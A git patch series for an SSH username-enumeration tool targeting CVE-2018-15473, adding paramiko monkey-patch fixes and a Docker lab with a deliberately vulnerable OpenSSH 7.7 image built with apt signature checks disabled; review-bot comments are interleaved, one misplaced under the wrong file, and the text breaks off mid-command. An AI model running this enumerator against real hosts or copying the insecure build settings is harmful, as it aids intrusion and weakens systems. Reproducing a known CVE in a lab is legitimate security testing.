From 496a6cdb376142f7c1b737a4c01f67cd9df47ede Mon Sep 17 00:00:00 2001
From: cyberaguiar
Date: Mon, 29 Apr 2024 10:08:56 -0300
Subject: [PATCH 1/4] Refactor handler table references in SSH monkey patch

---
 ssh-username-enum.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/ssh-username-enum.py b/ssh-username-enum.py
index a6ac90e..4f80268 100755
--- a/ssh-username-enum.py
+++ b/ssh-username-enum.py
@@ -82,7 +82,7 @@ def patched_add_boolean(*args, **kwargs):
 """ Override correct behavior of paramiko.message.Message.add_boolean, used to produce malformed packets. """
 auth_handler = paramiko.auth_handler.AuthHandler
- old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
+ old_msg_service_accept = auth_handler._handler_table.get(paramiko.common.MSG_SERVICE_ACCEPT)
 def patched_msg_service_accept(*args, **kwargs):
 """ Patches paramiko.message.Message.add_boolean to produce a malformed packet. """
@@ -95,7 +95,7 @@ def patched_userauth_failure(*args, **kwargs):
 """ Called during authentication when a username is not found. """
 raise InvalidUsername(*args, **kwargs)
- auth_handler._client_handler_table.update({
+ auth_handler._handler_table.update({
 paramiko.common.MSG_SERVICE_ACCEPT: patched_msg_service_accept,
 paramiko.common.MSG_USERAUTH_FAILURE: patched_userauth_failure
 })
From e3d5ac16def10f5f2c8c2ed9f9e2bd5576674ade Mon Sep 17 00:00:00 2001
From: cyberaguiar
Date: Mon, 29 Apr 2024 10:09:27 -0300
Subject: [PATCH 2/4] Update cffi library to version 1.14.6 in requirements

---
 requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements.txt b/requirements.txt
index f4ef21a..a3a716e 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,6 +1,6 @@
 asn1crypto==0.24.0
 bcrypt==3.1.4
-cffi==1.11.5
+cffi==1.14.6
 cryptography==2.3.1
 idna==2.7
 paramiko==2.4.1
From 3bbaa432e5dd3914d0aa8fd1bb44b1b2ed830bdf Mon Sep 17 00:00:00 2001
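Review bot: `_handler_table.get(paramiko.common.MSG_SERVICE_ACCEPT)` on the added line yields `None` when the key is absent, and the hunk adds no check for that, so on a paramiko build whose table lacks the entry the failure would surface later, presumably when `old_msg_service_accept` is invoked from `patched_msg_service_accept` (whose body lies outside this hunk), as an obscure `TypeError` inside paramiko rather than at patch time. The removed subscript raised `KeyError` immediately; keep that fail-fast behaviour with `old_msg_service_accept = auth_handler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]`, or follow the `.get()` with `if old_msg_service_accept is None: raise RuntimeError("paramiko AuthHandler has no MSG_SERVICE_ACCEPT handler; unsupported paramiko version")`. Both `_handler_table` and the `_client_handler_table` it replaces are private paramiko attributes whose name depends on the installed version, so a comment recording the version this relies on (the repository's requirements.txt pins `paramiko==2.4.1`, visible in the next patch) would help the next maintainer. The `def` line of the enclosing function appears only in the hunk header, outside the hunk.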
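Review bot: `auth_handler._handler_table.update({...})` on the changed line mutates a dict reached through the `AuthHandler` class itself (`auth_handler` is bound to `paramiko.auth_handler.AuthHandler` in the previous hunk), so the replacement handlers apply to every AuthHandler created afterwards in this process, not only to the connections this script opens, and nothing in the hunk keeps the original entries for restoration. If that process-wide effect is intended, a comment above the call such as `# Process-wide: patches AuthHandler's class-level handler table; every later connection inherits these handlers` would make it explicit to readers. Otherwise capture the originals first, e.g. `_orig_handlers = {k: auth_handler._handler_table.get(k) for k in (paramiko.common.MSG_SERVICE_ACCEPT, paramiko.common.MSG_USERAUTH_FAILURE)}`, so they can be put back when enumeration finishes. Whether anything later in the file restores the table is not visible from this hunk.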
From: cyberaguiar
Date: Mon, 29 Apr 2024 10:10:04 -0300
Subject: [PATCH 3/4] Add Docker setup instructions to README

---
 README.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/README.md b/README.md
index 9748325..225f2fc 100644
--- a/README.md
+++ b/README.md
@@ -18,6 +18,20 @@ pipenv install -r requirements.txt # if you're cool like that
 chmod u+x ssh-username-enum.py
 ```
+Docker Setup
+---
+Build Docker images
+```bash
+docker build -t vulnerable-openssh -f Dockerfile-openssh .
+docker build -t cve-2018-15473 -f Dockerfile-cve-2018-15473 .
+```
+
+Run Docker containers
+```bash
+docker run -d --name vulnerable-openssh vulnerable-openssh
+docker run -it --rm --link vulnerable-openssh:vulnerable-openssh cve-2018-15473 python ssh-username-enum.py -v -w users.txt -p 22 vulnerable-openssh
+```
+
 Examples
 ---
 A single username
From 570832b6618375237d2d4afbb1d529c347449df8 Mon Sep 17 00:00:00 2001
From: cyberaguiar
Date: Mon, 29 Apr 2024 10:10:15 -0300
Subject: [PATCH 4/4] Add new Dockerfiles and user list for CVE testing

---
 Dockerfile-cve-2018-15473 | 22 ++++++++++++++++++++
 Dockerfile-openssh | 43 +++++++++++++++++++++++++++++++++++++++
 users.txt | 11 ++++++++++
 3 files changed, 76 insertions(+)
 create mode 100644 Dockerfile-cve-2018-15473
 create mode 100644 Dockerfile-openssh
 create mode 100644 users.txt

diff --git a/Dockerfile-cve-2018-15473 b/Dockerfile-cve-2018-15473
new file mode 100644
index 0000000..813119e
--- /dev/null
+++ b/Dockerfile-cve-2018-15473
@@ -0,0 +1,22 @@
+# Use the official Python image from the Docker Hub
+FROM python:3.9
+
+# Install system dependencies
+RUN apt-get update && apt-get install -y libffi-dev gcc
+
+# Set the working directory in the container
+WORKDIR /app
+
+# Copy the requirements file into the container at /app
+COPY requirements.txt .
+COPY users.txt .
+
+# Install the dependencies
+RUN pip install --no-cache-dir -r requirements.txt
+
+# Copy the script into the container at /app
+COPY ssh-username-enum.py .
+
+# Run the script when the container launches
+CMD ["python", "ssh-username-enum.py"]
+
diff --git a/Dockerfile-openssh b/Dockerfile-openssh
new file mode 100644
index 0000000..f44c6de
--- /dev/null
+++ b/Dockerfile-openssh
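Review bot: The image runs `ssh-username-enum.py` as root, because no `USER` instruction follows the `WORKDIR /app` and `COPY` lines; the script only needs to read the files copied in, so adding `RUN useradd --create-home enum` and `USER enum` just before the `CMD` line drops that privilege at no cost. The `apt-get install -y libffi-dev gcc` line also leaves the apt package lists and recommended packages in the final layer; `RUN apt-get update && apt-get install -y --no-install-recommends libffi-dev gcc && rm -rf /var/lib/apt/lists/*` keeps the image smaller and the build more reproducible. `FROM python:3.9` resolves to whatever that tag currently points at, so pinning it by digest is worth considering if the image is meant to be rebuilt identically later. A brief comment above `CMD` saying which options the script expects would help, since the README patch in this series shows the full command being supplied on the `docker run` line rather than here.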
@@ -0,0 +1,43 @@
+# Use Debian Jessie as the base image
+FROM debian:jessie
+
+# Disable GPG signature checking and update repositories to archived versions
+RUN echo 'Acquire::Check-Valid-Until "false";' >> /etc/apt/apt.conf.d/10no-check-valid-until && \
+ echo 'Acquire::AllowInsecureRepositories "true";' >> /etc/apt/apt.conf.d/10allow-insecure && \
+ sed -i 's/http:\/\/deb.debian.org\/debian/http:\/\/archive.debian.org\/debian/g' /etc/apt/sources.list && \
+ sed -i 's/http:\/\/security.debian.org\/debian-security/http:\/\/archive.debian.org\/debian-security/g' /etc/apt/sources.list && \
+ sed -i '/jessie-updates/d' /etc/apt/sources.list
+
+# Update packages and install necessary dependencies
+RUN apt-get update && \
+ apt-get install -y --force-yes wget build-essential zlib1g-dev libssl-dev libpam0g-dev openssh-client
+
+# Download and compile OpenSSH version 7.7
+RUN wget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.7p1.tar.gz && \
+ tar xzf openssh-7.7p1.tar.gz && \
+ cd openssh-7.7p1 && \
+ ./configure --with-md5-passwords --with-privsep-path=/var/lib/sshd && \
+ make && make install
+
+# Create a user and group for SSHD privilege separation
+RUN groupadd sshd && \
+ useradd -g sshd -c 'sshd privsep' -d /var/lib/sshd -s /bin/false sshd
+
+# Create the user 'cyberaguiar'
+RUN useradd -m cyberaguiar
+
+# Generate a random password and set it for the user 'cyberaguiar'
+RUN echo "cyberaguiar:$(tr -dc A-Za-z0-9